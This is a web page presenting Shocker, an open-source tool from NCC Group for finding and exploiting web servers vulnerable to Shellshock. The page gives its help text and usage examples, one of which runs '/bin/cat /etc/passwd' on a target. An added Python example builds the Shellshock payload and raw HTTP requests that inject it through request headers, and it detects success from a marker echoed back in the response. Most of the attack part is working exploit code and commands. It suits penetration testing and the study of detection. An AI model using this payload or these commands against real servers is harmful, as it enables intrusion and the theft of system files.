Shocker – A tool to find and exploit servers vulnerable to Shellshock

    Shocker is a tool to find and exploit servers vulnerable to Shellshock
    Released as open source by NCC Group Plc – https://www.nccgroup.trust/
    Developed By: Tom Watson, tom [dot] watson [at] nccgroup [dot] trust
    https://github.com/nccgroup/shocker
    Help Text
    usage: shocker.py
    -h, --help show this help message and exit
    --Host HOST, -H HOST A target hostname or IP address
    --file FILE, -f FILE File containing a list of targets
    --port PORT, -p PORT The target port number (default=80)
    --exploit EXPLOIT, -e EXPLOIT Command to execute (default=/bin/uname -a)
    --cgi CGI, -c CGI Single CGI to check (e.g. /cgi-bin/test.cgi)
    --proxy PROXY A BIT BROKEN RIGHT NOW Proxy to be used in the form 'ip:port'
    --ssl, -s Use SSL (default=False)
    --threads THREADS, -t THREADS Maximum number of threads (default=10, max=100)
    --verbose, -v Be verbose in output
    

    Usage Examples

    ./shocker.py -H 127.0.0.1 -e "/bin/cat /etc/passwd" -c /cgi-bin/test.cgi

    Scans for http://127.0.0.1/cgi-bin/test.cgi and, if found, attempts to cat /etc/passwd

    ./shocker.py -H www.example.com -p 8001 -s

    Scans www.example.com on port 8001 over SSL for every script in cgi_list and attempts the default exploit against any that are found

    ./shocker.py -f ./hostlist

    Scans all hosts listed in the file ./hostlist with the default options
    Dependencies
    Python 2.7+
    Todo:

    • Identify and respond correctly to HTTP/200 response – false positives – Low priority/hassle
    • Implement curses for *nix systems – For the whole application or only the pseudo terminal? – Low priority/prettiness.
    • Thread the initial host check now that multiple targets are supported (and this could make that step time consuming)
    • Change verbose to integer value – quiet, normal, verbose, debug?
    • Add option to skip initial host checks for the sake of speed?
    • Add a summary of results before exiting
    • Save results to a file? Format?
    • Eventually the idea is to include multiple possible vectors but currently only one is checked.
    • Add Windows and *nix colour support – Low priority/prettiness
    • Add a timeout in interactive mode for commands which don’t return, e.g. /bin/cat /dev/zero
    • Prettify – Low priority/prettiness (obviously)
    • Add support for scanning and exploiting SSH and SMTP https://isc.sans.edu/diary/Shellshock+via+SMTP/18879
    • Add SOCKS proxy support, potentially using https://github.com/rpicard/socksonsocks/ from Robert Picard
    • Other stuff. Probably.
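    The usage examples above and the first Todo item (HTTP 200 responses producing false positives) both come down to one design point: a Shellshock check should only report a host as vulnerable when the injected command's output is actually reflected back, never because the CGI merely answered 200. The following Python 3 block is an added example written for this page, not Shocker's own code. It builds the classic Shellshock (CVE-2014-6271) payload, places it in a header that CGI servers export into the script's environment, and decides the verdict from a random marker in the response body. It does no network I/O; the header list, the "shock-" marker prefix and the three sample responses are constructed for illustration.

```python
"""Marker-based Shellshock CGI check (added example, not Shocker's own code)."""
import secrets
from typing import Any, Dict

# A Bash function definition followed by trailing commands. Vulnerable Bash
# versions execute the trailing commands while importing the variable.
SHELLSHOCK_PREFIX = "() { :;}; "

# Request headers that CGI servers typically export into the script's
# environment (HTTP_USER_AGENT, HTTP_COOKIE, HTTP_REFERER). Assumed list.
INJECTION_HEADERS = ("User-Agent", "Cookie", "Referer")


def new_marker() -> str:
    """Random per-scan token; only its reflection proves code execution."""
    return "shock-" + secrets.token_hex(8)


def build_payload(marker: str, command: str = "/bin/uname -a") -> str:
    """The leading 'echo;' terminates the CGI header block, so the marker and
    the command output land in the HTTP body instead of being parsed as headers."""
    return f'{SHELLSHOCK_PREFIX}echo; echo "{marker}"; {command}'


def build_request(host: str, path: str, header: str, payload: str, port: int = 80) -> str:
    """Raw HTTP/1.1 GET carrying the payload in one chosen header."""
    if header not in INJECTION_HEADERS:
        raise ValueError(f"unsupported injection header: {header}")
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}:{port}",
        f"{header}: {payload}",
        "Connection: close",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"


def check_response(raw: str, marker: str) -> Dict[str, Any]:
    """Decide from a raw HTTP response whether the target ran the payload.

    The verdict depends only on the marker appearing in the body. A 200 on
    its own proves nothing: a CGI that exists but runs patched Bash (or is
    not a shell script at all) also returns 200, which is exactly the
    false-positive case from the Todo list.
    """
    head, _sep, body = raw.partition("\r\n\r\n")
    status_line = head.split("\r\n", 1)[0]
    try:
        status = int(status_line.split()[1])
    except (IndexError, ValueError):
        status = 0
    idx = body.find(marker)
    if idx == -1:
        return {"vulnerable": False, "status": status, "output": ""}
    # Everything after the marker is the injected command's output.
    output = body[idx + len(marker):].strip()
    return {"vulnerable": True, "status": status, "output": output}


# Fixed marker so the constructed samples below are reproducible.
MARKER = "shock-0123456789abcdef"

# Constructed responses; none of these were captured from a real host.
VULNERABLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/plain\r\n"
    "\r\n"
    f"{MARKER}\n"
    "Linux cgi-host 3.13.0 x86_64 GNU/Linux\n"
)
PATCHED_RESPONSE = (  # script exists, returns 200, but nothing is reflected
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>test.cgi is working</body></html>\n"
)
MISSING_RESPONSE = "HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n\r\nNot Found\n"


if __name__ == "__main__":
    marker = new_marker()
    print(build_request("127.0.0.1", "/cgi-bin/test.cgi", "User-Agent",
                        build_payload(marker, "/bin/cat /etc/passwd")))
    for name, resp in (("vulnerable", VULNERABLE_RESPONSE),
                       ("patched", PATCHED_RESPONSE),
                       ("missing", MISSING_RESPONSE)):
        print(name, check_response(resp, MARKER))
```

    In a real scan the marker must be generated per request (new_marker) and the request sent over a socket, with the same payload tried in each header of INJECTION_HEADERS; the verdict logic in check_response stays unchanged. Note that the output is attributed to the command only because the marker was echoed first, which is also why the payload puts 'echo;' before the marker rather than relying on the server's own headers.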

    Download Shocker at Github
